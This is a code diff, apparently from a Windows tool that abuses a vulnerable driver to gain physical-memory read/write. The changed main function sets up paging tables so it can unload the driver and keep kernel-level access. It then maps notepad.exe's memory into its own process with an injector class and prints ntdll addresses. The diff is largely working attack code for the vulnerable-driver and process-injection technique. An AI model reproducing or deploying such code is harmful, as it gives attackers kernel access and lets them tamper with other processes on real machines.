|
|
@ -11,18 +11,47 @@ int __cdecl main(int argc, char** argv)
|
|
|
|
return -1;
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
vdm::vdm_ctx vdm;
|
|
|
|
// read physical memory using the driver...
|
|
|
|
|
|
|
|
vdm::read_phys_t _read_phys =
|
|
|
|
|
|
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return vdm::read_phys(addr, buffer, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// write physical memory using the driver...
|
|
|
|
|
|
|
|
vdm::write_phys_t _write_phys =
|
|
|
|
|
|
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return vdm::write_phys(addr, buffer, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
vdm::vdm_ctx vdm(_read_phys, _write_phys);
|
|
|
|
nasa::mem_ctx my_proc(vdm);
|
|
|
|
nasa::mem_ctx my_proc(vdm);
|
|
|
|
nasa::mem_ctx notepad_proc(vdm, util::get_pid("notepad.exe"));
|
|
|
|
|
|
|
|
nasa::injector_ctx injector(&my_proc, ¬epad_proc);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// driver no longer needs to be loaded since paging tables are all setup :^)
|
|
|
|
// read physical memory via paging tables and not with the driver...
|
|
|
|
|
|
|
|
_read_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return my_proc.read_phys(buffer, addr, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// write physical memory via paging tables and not with the driver...
|
|
|
|
|
|
|
|
_write_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return my_proc.write_phys(buffer, addr, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
if (!vdm::unload_drv(drv_handle, drv_key))
|
|
|
|
if (!vdm::unload_drv(drv_handle, drv_key))
|
|
|
|
{
|
|
|
|
{
|
|
|
|
std::printf("[!] unable to unload vulnerable driver...\n");
|
|
|
|
std::printf("[!] unable to unload vulnerable driver...\n");
|
|
|
|
return -1;
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
vdm.set_read(_read_phys);
|
|
|
|
|
|
|
|
vdm.set_write(_write_phys);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
nasa::mem_ctx notepad_proc(vdm, util::get_pid("notepad.exe"));
|
|
|
|
|
|
|
|
nasa::injector_ctx injector(&my_proc, ¬epad_proc);
|
|
|
|
|
|
|
|
|
|
|
|
if (!injector.init())
|
|
|
|
if (!injector.init())
|
|
|
|
{
|
|
|
|
{
|
|
|
|
std::printf("[!] failed to init injector_ctx...\n");
|
|
|
|
std::printf("[!] failed to init injector_ctx...\n");
|
|
|
@ -33,11 +62,8 @@ int __cdecl main(int argc, char** argv)
|
|
|
|
reinterpret_cast<std::uintptr_t>(
|
|
|
|
reinterpret_cast<std::uintptr_t>(
|
|
|
|
GetModuleHandleA("ntdll.dll"));
|
|
|
|
GetModuleHandleA("ntdll.dll"));
|
|
|
|
|
|
|
|
|
|
|
|
const auto ntdll_inject_addr = injector.translate(ntdll_base);
|
|
|
|
const auto ntdll_base_injected = injector.translate(ntdll_base);
|
|
|
|
std::printf("[+] ntdll base address -> 0x%p\n", ntdll_base);
|
|
|
|
std::printf("[+] ntdll base -> 0x%p\n", ntdll_base_injected);
|
|
|
|
std::printf("[+] ntdll reverse inject address -> 0x%p\n", ntdll_inject_addr);
|
|
|
|
|
|
|
|
std::printf("[+] ntdll MZ -> 0x%x\n", *(short*)ntdll_inject_addr);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
std::printf("[+] press any key to close...\n");
|
|
|
|
std::printf("[+] press any key to close...\n");
|
|
|
|
std::getchar();
|
|
|
|
std::getchar();
|
|
|
|
}
|
|
|
|
}
|